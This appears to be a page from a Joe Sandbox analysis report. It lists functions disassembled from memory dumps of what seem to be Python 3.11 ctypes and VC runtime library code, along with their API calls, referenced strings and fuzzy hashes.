Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: DeallocErr_StringSubtypeType_
String ID: has no _stginfo_
API String ID: 402260271-2912685656
Opcode ID: 9230919844186ca5f41c7b1a63fcb82edb38cf4c596bbf94e99535158fbb2ad0
Instruction ID: d6e2f4c24cfaf83f2aab6842c4867d7be2c2a9d4ddd7eceeb0941b139807b000
Opcode Fuzzy Hash: 9230919844186ca5f41c7b1a63fcb82edb38cf4c596bbf94e99535158fbb2ad0
Instruction Fuzzy Hash: 6EB10562A09FC596EB648F29E85027A63B5FB88BC4F14A435EB4E53754DF3CE958C300

Function 00007FF8B9F6BF20 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6C1C0

Strings

volatile , xrefs: 00007FF8B9F6BF87, 00007FF8B9F6C0B8
std::nullptr_t, xrefs: 00007FF8B9F6C179
volatile, xrefs: 00007FF8B9F6BF96, 00007FF8B9F6C0C7
std::nullptr_t , xrefs: 00007FF8B9F6C150

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: Name::operator+
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2943138195-757766384
Opcode ID: e51d893b916fd38dc1e020bc8963aa6f83aa847b46c3d095f24d6897074767ca
Instruction ID: 5cdc757730fbfa287a218cd78873c2f23a4a63f33691d33ad491cf2fd0dde0ab
Opcode Fuzzy Hash: e51d893b916fd38dc1e020bc8963aa6f83aa847b46c3d095f24d6897074767ca
Instruction Fuzzy Hash: DF718972A08B8694FB508FACD9410BC6BA1BB047E6F446536DB8D47BA9DF3CE250C300

Function 00007FF8B93C24A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

PyMem_Malloc.PYTHON311(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,00007FF8B93C3784), ref: 00007FF8B93C24ED
PyMem_Free.PYTHON311(?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,00007FF8B93C3784), ref: 00007FF8B93C25DB

Strings

%zd), xrefs: 00007FF8B93C2568
%zd,, xrefs: 00007FF8B93C255A

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Mem_$FreeMalloc
String ID: %zd)$%zd,
API String ID: 3308143561-2233965340
Opcode ID: 97bbcc1d359357e3c252192984d3b0109526b27b564f2bbea6cf16545a3b7b27
Instruction ID: f45146f69f9bf4cf0af8457ccab0cf3b430122d48b33274896b1fa61b040d2b2
Opcode Fuzzy Hash: 97bbcc1d359357e3c252192984d3b0109526b27b564f2bbea6cf16545a3b7b27
Instruction Fuzzy Hash: 20418C22A09BC581EB158F19A4602BBA7A0EF5EFD4F882131DF5E57691DE3DE44AC310

Function 00007FF8B93CA3C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93CA3F3
PyObject_IsInstance.PYTHON311 ref: 00007FF8B93CA42E
PyErr_Format.PYTHON311 ref: 00007FF8B93CA45E

Strings

Pointer does not support item deletion, xrefs: 00007FF8B93CA3E9
expected %s instead of %s, xrefs: 00007FF8B93CA441

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$FormatInstanceObject_String
String ID: Pointer does not support item deletion$expected %s instead of %s
API String ID: 341772743-2046472288
Opcode ID: 56d4fabad618d8a5c8e6f1fde8dcb41e7996936431b442245916351dcbdf5c73
Instruction ID: 9902c8ccd7036716ac19bb652925597741f88c10d1132626c04ca6f7bc318ece
Opcode Fuzzy Hash: 56d4fabad618d8a5c8e6f1fde8dcb41e7996936431b442245916351dcbdf5c73
Instruction Fuzzy Hash: 2521FD61A08F8282EA549F6EE8640BA2371EF8DFD4F156532EF1D87795DE3CD4898300

Function 00007FF8B93CDB58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON311 ref: 00007FF8B93CDB7E
PyLong_FromLong.PYTHON311 ref: 00007FF8B93CDBE9
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CDC01
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CDC16

Strings

OO:CopyComPointer, xrefs: 00007FF8B93CDB71

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$Arg_FromLongLong_ParseTuple
String ID: OO:CopyComPointer
API String ID: 1908940310-822416302
Opcode ID: a50de67720cd425b58803957e1784c7b340943145018a53cdb6de08dc5e3c1c0
Instruction ID: ec6d62d34a387daf764717770be696213ee7aa2b1db3be285eaa64ead6a38ea6
Opcode Fuzzy Hash: a50de67720cd425b58803957e1784c7b340943145018a53cdb6de08dc5e3c1c0
Instruction Fuzzy Hash: A8215136A08F8685EB159F7998401BD23B4FF4CBD8F089235EB2D57A94CE3CE0498310

Function 00007FF8B93C57CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

PyDict_Next.PYTHON311 ref: 00007FF8B93C93A2
PyErr_SetString.PYTHON311 ref: 00007FF8B93C93C2

Strings

args not a tuple?, xrefs: 00007FF8B93C93B1
too many initializers, xrefs: 00007FF8B93C9367

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dict_Err_NextString
String ID: args not a tuple?$too many initializers
API String ID: 1977209248-2791065560
Opcode ID: f4fd08385035d02860af40dbb96f0e851c8c10ea306c559d0ae5fa500cb6d0af
Instruction ID: b4b2feb35355580a411a666444ad4e42840bee63590425223dc4d95f604d728d
Opcode Fuzzy Hash: f4fd08385035d02860af40dbb96f0e851c8c10ea306c559d0ae5fa500cb6d0af
Instruction Fuzzy Hash: 4C211D61A08FC281EA508F19E45037A63B0EF89BE4F156332EB6D536E5CF6CD989C740

Function 00007FF8B93CE008 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

PySys_Audit.PYTHON311 ref: 00007FF8B93CE022
PyArg_ParseTuple.PYTHON311 ref: 00007FF8B93CE060
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CE096
PyLong_FromLong.PYTHON311 ref: 00007FF8B93CE09E

Strings

ctypes.set_errno, xrefs: 00007FF8B93CE011

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Arg_AuditDeallocFromLongLong_ParseSys_Tuple
String ID: ctypes.set_errno
API String ID: 928689845-1564666054
Opcode ID: 59a8a5489d63178a80b732e192b127fc94092e90c4c175c04c3ca01ed042f338
Instruction ID: 38a5f865acc1b35cd572bd9fab8c5e28f2d63f36d282027af21acca2edd8ccb7
Opcode Fuzzy Hash: 59a8a5489d63178a80b732e192b127fc94092e90c4c175c04c3ca01ed042f338
Instruction Fuzzy Hash: D611C661E18BC682EF644F6AE89407A27B4EF4DBC0F487031DB1D46250DE2CE999C740

Function 00007FF8B93CE0B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON311 ref: 00007FF8B93CE060
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CE096
PyLong_FromLong.PYTHON311 ref: 00007FF8B93CE09E
PySys_Audit.PYTHON311 ref: 00007FF8B93CE0CA

Strings

ctypes.set_last_error, xrefs: 00007FF8B93CE0B9

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Arg_AuditDeallocFromLongLong_ParseSys_Tuple
String ID: ctypes.set_last_error
API String ID: 928689845-913187751
Opcode ID: f23f19bccc13864e0ba767f98ec326220a154fbbf3424597505e894eb8dd0003
Instruction ID: d91cc30250279f2e818f3af9d67202fafa891e6f7a1a830f94595884e9a5eb12
Opcode Fuzzy Hash: f23f19bccc13864e0ba767f98ec326220a154fbbf3424597505e894eb8dd0003
Instruction Fuzzy Hash: B111C661F08B8682EF744F6AE8940BA2774EF4EBC1F086031DB1D06250DE2CE9998740

Function 00007FF8B93CB8B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B93C3D98: PyType_IsSubtype.PYTHON311(?,?,?,?,00007FF8B93C132C), ref: 00007FF8B93C3DB1

PyUnicode_AsUTF8.PYTHON311 ref: 00007FF8B93CB90C
strchr.VCRUNTIME140 ref: 00007FF8B93CB91C
PyErr_Format.PYTHON311 ref: 00007FF8B93CB952

Strings

'out' parameter %d must be a pointer type, not %s, xrefs: 00007FF8B93CB945
PzZ, xrefs: 00007FF8B93CB912

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_FormatSubtypeType_Unicode_strchr
String ID: 'out' parameter %d must be a pointer type, not %s$PzZ
API String ID: 3500358371-2360062653
Opcode ID: fceb702919c06022e64addd7c9aaba2d34447d85d2b2cb0159e7ba4236f850e0
Instruction ID: c9a3f0f6d7a7327edd2a78cb5a006f7274a010d7469775e5b672508c79df48b6
Opcode Fuzzy Hash: fceb702919c06022e64addd7c9aaba2d34447d85d2b2cb0159e7ba4236f850e0
Instruction Fuzzy Hash: 7C111921A08B8791EB509F29E49427A23B5EF9DFC8F446032DF4D47265DE2CE888C340

Function 00007FF8B93CC174 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B93C3D98: PyType_IsSubtype.PYTHON311(?,?,?,?,00007FF8B93C132C), ref: 00007FF8B93C3DB1

PyUnicode_AsUTF8.PYTHON311 ref: 00007FF8B93CC1CA
strchr.VCRUNTIME140 ref: 00007FF8B93CC1DA
PyErr_Format.PYTHON311 ref: 00007FF8B93CC20D

Strings

cast() argument 2 must be a pointer type, not %s, xrefs: 00007FF8B93CC203
sPzUZXO, xrefs: 00007FF8B93CC1D0

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_FormatSubtypeType_Unicode_strchr
String ID: cast() argument 2 must be a pointer type, not %s$sPzUZXO
API String ID: 3500358371-1038790478
Opcode ID: 00c494f3386268376c83a7897981a44eeb5e2169e225d7a55c5354403a66d736
Instruction ID: 3f9395c8596d587f0814e9cc830cf54ee4f78df97e4705e12c9ec3e9f92d9ec1
Opcode Fuzzy Hash: 00c494f3386268376c83a7897981a44eeb5e2169e225d7a55c5354403a66d736
Instruction Fuzzy Hash: 8A110D61B09BC691FF259F5A989427923B4AF9EFC4F486435CB4E47261DE2CE888C310

Function 00007FF8B93C4F94 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

PyObject_GetAttrString.PYTHON311(?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C4FA8
PyDict_New.PYTHON311(?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C4FBC
PyErr_NewException.PYTHON311(?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C4FDA

Part of subcall function 00007FF8B93C5028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C504E
Part of subcall function 00007FF8B93C5028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5065
Part of subcall function 00007FF8B93C5028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C507D
Part of subcall function 00007FF8B93C5028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C50A0
Part of subcall function 00007FF8B93C5028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C50C6
Part of subcall function 00007FF8B93C5028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C50EC
Part of subcall function 00007FF8B93C5028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5112
Part of subcall function 00007FF8B93C5028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5138
Part of subcall function 00007FF8B93C5028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C515E
Part of subcall function 00007FF8B93C5028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5181
Part of subcall function 00007FF8B93C5028: PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C51A7
Part of subcall function 00007FF8B93C5028: PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C51CD
Part of subcall function 00007FF8B93C5028: PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C51F3
Part of subcall function 00007FF8B93C5028: PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5219

Part of subcall function 00007FF8B93C5304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C532F
Part of subcall function 00007FF8B93C5304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5366
Part of subcall function 00007FF8B93C5304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C538B
Part of subcall function 00007FF8B93C5304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C53AA
Part of subcall function 00007FF8B93C5304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C53CC
Part of subcall function 00007FF8B93C5304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C53EB
Part of subcall function 00007FF8B93C5304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C540D
Part of subcall function 00007FF8B93C5304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C542C
Part of subcall function 00007FF8B93C5304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5451
Part of subcall function 00007FF8B93C5304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5470
Part of subcall function 00007FF8B93C5304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B93C500E,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5495

Strings

_unpickle, xrefs: 00007FF8B93C4F9E
ctypes.ArgumentError, xrefs: 00007FF8B93C4FD1

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Module_ReadyType_$Object$FromLongLong_$Type$AttrDict_Err_ExceptionObject_String
String ID: _unpickle$ctypes.ArgumentError
API String ID: 4217053054-165408235
Opcode ID: 32827969c832a808a66d5017e69f26ea533dafa79bf6c295bc1895e8a6d04efa
Instruction ID: 3072577ff940ea1983f0c9cd1f36180fe4530b680ffe9e944962d8eccba055b1
Opcode Fuzzy Hash: 32827969c832a808a66d5017e69f26ea533dafa79bf6c295bc1895e8a6d04efa
Instruction Fuzzy Hash: 6501ED25A1DF9782FB609F6DA96013622A9AF4DBD0F446134DA5D827A1EF3CF0598300

Function 00007FF8B93C5820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

PyDict_DelItem.PYTHON311 ref: 00007FF8B93C583B
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C585E
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C5888
_PyErr_WriteUnraisableMsg.PYTHON311 ref: 00007FF8B93C93D9

Strings

on calling _ctypes.DictRemover, xrefs: 00007FF8B93C93D2

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$Dict_Err_ItemUnraisableWrite
String ID: on calling _ctypes.DictRemover
API String ID: 2766432985-2232269487
Opcode ID: 256ea331e05c61a4a808f1e36cd886345c9bade03a7633d5d0aea444e30aedf2
Instruction ID: 1de2a134efff1a46d38b42c73554e66d059a1e55dc978e9e846cfceb610b39d8
Opcode Fuzzy Hash: 256ea331e05c61a4a808f1e36cd886345c9bade03a7633d5d0aea444e30aedf2
Instruction Fuzzy Hash: C6016D62E0AB8681FF688F6D88643392374EF9DFD5F582530CB1E151A0CF2CD8498300

Function 00007FF8B93CB368 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

PyUnicode_FromFormat.PYTHON311 ref: 00007FF8B93CB397
PyUnicode_FromFormat.PYTHON311 ref: 00007FF8B93CB3C9
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CB3DB

Strings

%s(%R), xrefs: 00007FF8B93CB3BB
<%s object at %p>, xrefs: 00007FF8B93CB390

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: FormatFromUnicode_$Dealloc
String ID: %s(%R)$<%s object at %p>
API String ID: 1714529502-296555854
Opcode ID: 7e64ef3b32a657b11c2f44244a8f51ce1e0c9cec8aec46fab4d60a3fe1e5b4e0
Instruction ID: 84eec769a35741de9364ef4a685a4a4e8c26155e51a0ec0b156d9be1648c5293
Opcode Fuzzy Hash: 7e64ef3b32a657b11c2f44244a8f51ce1e0c9cec8aec46fab4d60a3fe1e5b4e0
Instruction Fuzzy Hash: 4501E561A09A8681EE149F2AE89006A6375FF5DFC4B086132CF0D073A4DE2CE899C340

Function 00007FF8B93CC938 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

PySys_GetObject.PYTHON311 ref: 00007FF8B93CC96C
PyOS_vsnprintf.PYTHON311 ref: 00007FF8B93CC98F
PyFile_WriteString.PYTHON311 ref: 00007FF8B93CC9AB
PyErr_Print.PYTHON311 ref: 00007FF8B93CC9B1

Strings

stderr, xrefs: 00007FF8B93CC965

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_File_ObjectPrintS_vsnprintfStringSys_Write
String ID: stderr
API String ID: 1103062482-1769798200
Opcode ID: 9a0837009893c9ce3f6b921fad968050c61bacc10e62fde9b4fb5cee5af4f5c7
Instruction ID: 4982cfa815bb14c03a6cbbf72908255b8741eb171a3d27c1d298095c0ef52a2a
Opcode Fuzzy Hash: 9a0837009893c9ce3f6b921fad968050c61bacc10e62fde9b4fb5cee5af4f5c7
Instruction Fuzzy Hash: E101E962A18B8591EA308F54F4A97AA73B4FF9DB81F441036CA8D46764DE3CE558CB40

Function 00007FF8B93CF4E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON311 ref: 00007FF8B93CF515
memcpy.VCRUNTIME140 ref: 00007FF8B93CF539
PyErr_Format.PYTHON311 ref: 00007FF8B93CF560

Strings

expected bytes, %s found, xrefs: 00007FF8B93CF507
bytes too long (%zd, maximum length %zd), xrefs: 00007FF8B93CF556

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_Format$memcpy
String ID: bytes too long (%zd, maximum length %zd)$expected bytes, %s found
